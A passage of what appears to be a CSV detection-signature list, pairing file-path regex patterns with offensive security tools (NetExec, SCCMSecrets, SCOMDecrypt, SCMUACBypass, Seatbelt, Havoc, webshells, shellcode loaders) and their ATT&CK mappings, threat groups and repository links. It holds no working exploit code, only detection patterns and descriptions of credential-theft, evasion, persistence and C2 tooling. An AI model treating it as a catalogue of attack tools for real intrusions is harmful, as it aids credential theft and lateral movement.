"*/scan-network.py*",".{0,1000}\/scan\-network\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10714" "*/Scans/servers_all_smb*.txt*",".{0,1000}\/Scans\/servers_all_smb.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","10715" "*/ScareCrow -I 
*",".{0,1000}\/ScareCrow\s\-I\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Dent","1","0","#linux","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","10716" "*/sccmhunter*",".{0,1000}\/sccmhunter.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - 
TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","10717" "*/SCCMSecrets.git*",".{0,1000}\/SCCMSecrets\.git.{0,1000}","offensive_tool_keyword","SCCMSecrets","SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting - initial access and lateral movement.","T1555 - T1078 - T1070 - T1021","TA0006 - TA0008 - TA0001","N/A","N/A","Lateral Movement","https://github.com/synacktiv/SCCMSecrets","1","1","N/A","N/A","8","3","208","22","2024-12-17T14:29:39Z","2024-08-14T09:45:44Z","10718" "*/SCCMVNC.git*",".{0,1000}\/SCCMVNC\.git.{0,1000}","offensive_tool_keyword","SCCMVNC","A tool to modify SCCM remote control settings on the client machine - enabling remote control without permission prompts or notifications. This can be done without requiring access to SCCM server.","T1078 - T1562 - T1557","TA0005 - TA0003 - TA0008","N/A","N/A","Lateral Movement","https://github.com/netero1010/SCCMVNC","1","1","N/A","N/A","8","1","87","10","2024-10-20T14:29:43Z","2024-10-20T14:15:28Z","10719" "*/scdc/bob.jsp?f=fuckjp.jsp*",".{0,1000}\/scdc\/bob\.jsp\?f\=fuckjp\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","10720" "*/ScheduleRunner.git*",".{0,1000}\/ScheduleRunner\.git.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","10721" 
"*/SchTask.zip*",".{0,1000}\/SchTask\.zip.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","10722" "*/SchTask_0x727.git*",".{0,1000}\/SchTask_0x727\.git.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","10723" "*/SchTask_0x727/*",".{0,1000}\/SchTask_0x727\/.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","1","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","10724" "*/schtasksenum/*.*",".{0,1000}\/schtasksenum\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","10725" "*/sc-loader.exe*",".{0,1000}\/sc\-loader\.exe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","10726" "*/scmuacbypass.cpp*",".{0,1000}\/scmuacbypass\.cpp.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","10727" "*/SCMUACBypass.exe*",".{0,1000}\/SCMUACBypass\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SCMUACBypass","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10728" "*/SCMUACBypass.exe*",".{0,1000}\/SCMUACBypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - 
T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SCMUACBypass","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10729" "*/scmuacbypass.exe*",".{0,1000}\/scmuacbypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","10730" "*/SCMUACBypass.git*",".{0,1000}\/SCMUACBypass\.git.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","10731" "*/SCMUACBypass/*",".{0,1000}\/SCMUACBypass\/.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","10732" "*/SCOMDecrypt.git*",".{0,1000}\/SCOMDecrypt\.git.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","10733" "*/ScreenshotInject*",".{0,1000}\/ScreenshotInject.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black 
Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","10734" "*/script/reuse.py*",".{0,1000}\/script\/reuse\.py.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#linux","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","10735" "*/ScriptBlock-Smuggling.git*",".{0,1000}\/ScriptBlock\-Smuggling\.git.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","1","N/A","https://bc-security.org/scriptblock-smuggling/","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","10736" "*/scripts/xor.py*",".{0,1000}\/scripts\/xor\.py.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","10737" "*/ScriptSentry.git*",".{0,1000}\/ScriptSentry\.git.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","10738" "*/ScriptSentry.ps1*",".{0,1000}\/ScriptSentry\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous 
logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","10739" "*/ScriptSentry.psd1*",".{0,1000}\/ScriptSentry\.psd1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","10740" "*/ScriptSentry.psm1*",".{0,1000}\/ScriptSentry\.psm1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","10741" "*/ScRunHex.py*",".{0,1000}\/ScRunHex\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P 
- Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/scrun","1","1","N/A","N/A","10","10","179","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z","10742" "*/scshell*",".{0,1000}\/scshell.{0,1000}","offensive_tool_keyword","scshell","SCShell is a fileless Lateral Movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.The utility can be used remotely WITHOUT registering a service or creating a service. 
It also doesn't have to drop any file on the remote system* (Depend on the technique used to execute)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","Lateral Movement","https://github.com/Mr-Un1k0d3r/SCShell","1","0","#linux","N/A","N/A","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","10743" "*/scshell.py*",".{0,1000}\/scshell\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","10744" "*/scuffy.py*",".{0,1000}\/scuffy\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10745" "*/sdb-explorer.exe*",".{0,1000}\/sdb\-explorer\.exe.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","10746" "*/SearchShares.ps1*",".{0,1000}\/SearchShares\.ps1.{0,1000}","offensive_tool_keyword","SearchOpenFileShares","Searches open files shares for password files or database backups - Extend as you see fit","T1083 - T1135 - T1005 - T1025","TA0007 - 
TA0009","N/A","Dispossessor","Discovery","https://github.com/fashionproof/SearchOpenFileShares","1","1","N/A","N/A","7","1","29","6","2019-12-13T12:37:42Z","2019-09-21T13:50:26Z","10751" "*/searchsploit*",".{0,1000}\/searchsploit.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","10752" "*/Seatbelt.exe*",".{0,1000}\/Seatbelt\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - 
T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10753" "*/SeatBelt.exe*",".{0,1000}\/SeatBelt\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","10754" "*/Seatbelt.exe*",".{0,1000}\/Seatbelt\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10755" "*/Seatbelt.exe*",".{0,1000}\/Seatbelt\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Seatbelt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10756" "*/Seatbelt.exe*",".{0,1000}\/Seatbelt\.exe.{0,1000}","offensive_tool_keyword","seatbelt","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Seatbelt","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10757" "*/Seatbelt.exe*",".{0,1000}\/Seatbelt\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10758" "*/Seatbelt.git*",".{0,1000}\/Seatbelt\.git.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","10759" "*/Seatbelt.txt*",".{0,1000}\/Seatbelt\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","10760" "*/Seatbelt/Commands*",".{0,1000}\/Seatbelt\/Commands.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","10761" "*/seatbelt_json.py*",".{0,1000}\/seatbelt_json\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","10762" "*/SeAuditPrivilegePoC.exe*",".{0,1000}\/SeAuditPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","10763" "*/SeBackupPrivilege.md*",".{0,1000}\/SeBackupPrivilege\.md.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","N/A","10","2124","286","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z","10764" "*/SeBackupPrivilegePoC.exe*",".{0,1000}\/SeBackupPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","10765" "*/secinject.c*",".{0,1000}\/secinject\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 